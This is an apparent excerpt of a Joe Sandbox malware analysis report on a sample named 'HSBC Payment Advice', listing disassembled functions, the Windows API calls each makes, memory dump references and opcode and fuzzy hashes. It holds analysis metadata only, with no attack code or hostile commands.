          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Enum$CloseOpenValue
          • String ID:
          • API String ID: 167947723-0
          • Opcode ID: c2db8032390079b76bb5d25788585a9355f625a80f00ae826b435f508ff84699
          • Instruction ID: 196cef28da363d1279e483bf9a38a563a29f189f24dbcf66659da751fa440e39
          • Opcode Fuzzy Hash: c2db8032390079b76bb5d25788585a9355f625a80f00ae826b435f508ff84699
          • Instruction Fuzzy Hash: 87F0D1B1A04205ABE7108F65DE88ABF766CEF40358F60443EF405B21C0D6B85D419B6A
          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
          Download Yara Rule
          APIs
          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
          • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
          • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
          • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
          Function 004022D3 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
          • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CloseDeleteOpenValue
          • String ID:
          • API String ID: 849931509-0
          • Opcode ID: bde92a3829f5d0e0bdaac5b37758bb40a9fa5cdea16ab7bc8ccfb867e66faa79
          • Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
          • Opcode Fuzzy Hash: bde92a3829f5d0e0bdaac5b37758bb40a9fa5cdea16ab7bc8ccfb867e66faa79
          • Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A
          Function 00405265 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
          Download Yara Rule
          APIs
          • OleInitialize.OLE32(00000000), ref: 00405275
            • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
          • CoUninitialize.COMBASE(00000404,00000000), ref: 004052C1
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: InitializeMessageSendUninitialize
          • String ID:
          • API String ID: 2896919175-0
          • Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
          • Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
          • Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
          • Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D
          Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
          Download Yara Rule
          APIs
          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Window$EnableShow
          • String ID:
          • API String ID: 1136574915-0
          • Opcode ID: 4ab024c76fce48d64a04f4b80c9cd3d170a2f863ee883f07f8fb81d3241bb0e0
          • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
          • Opcode Fuzzy Hash: 4ab024c76fce48d64a04f4b80c9cd3d170a2f863ee883f07f8fb81d3241bb0e0
          • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
          Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
          Download Yara Rule
          APIs
          • GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$AttributesCreate
          • String ID:
          • API String ID: 415043291-0
          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
          Function 00405B2F Relevance: 3.0, APIs: 2, Instructions: 13COMMON
          Download Yara Rule
          APIs
          • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
          • Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
          • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
          • Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6
          Function 004037C0 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
          Download Yara Rule
          APIs
          • CloseHandle.KERNEL32(FFFFFFFF,76703420,0040361F,?), ref: 004037D2
          • CloseHandle.KERNEL32(FFFFFFFF,76703420,0040361F,?), ref: 004037E6
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CloseHandle
          • String ID:
          • API String ID: 2962429428-0
          • Opcode ID: ab6a5afdb87e4546ab9a70bea03761153ae091f709c166c5aceb8cc45ee36402
          • Instruction ID: 014ad41fc67124fc33d83177a1a498160c1112af25a74f466a95d4f42f1eb783
          • Opcode Fuzzy Hash: ab6a5afdb87e4546ab9a70bea03761153ae091f709c166c5aceb8cc45ee36402
          • Instruction Fuzzy Hash: E2E0867150461096C5346F7CAD85D453A185B41336B20C722F078F35F1C338AD865EAC
          Function 00402C42 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
          Download Yara Rule
          APIs
          • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Open
          • String ID:
          • API String ID: 71445658-0
          • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
          • Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
          • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
          • Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768
          Function 00405BD7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
          Download Yara Rule
          APIs
          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
          • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
          • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
          Function 00404179 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
          • Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
          • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
          • Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D
          Function 00404162 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
          • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
          • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
          • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
          Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
          Download Yara Rule
          APIs
          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: FilePointer
          • String ID:
          • API String ID: 973152223-0
          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
          Function 0040414F Relevance: 1.5, APIs: 1, Instructions: 4COMMON
          Download Yara Rule
          APIs
          • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
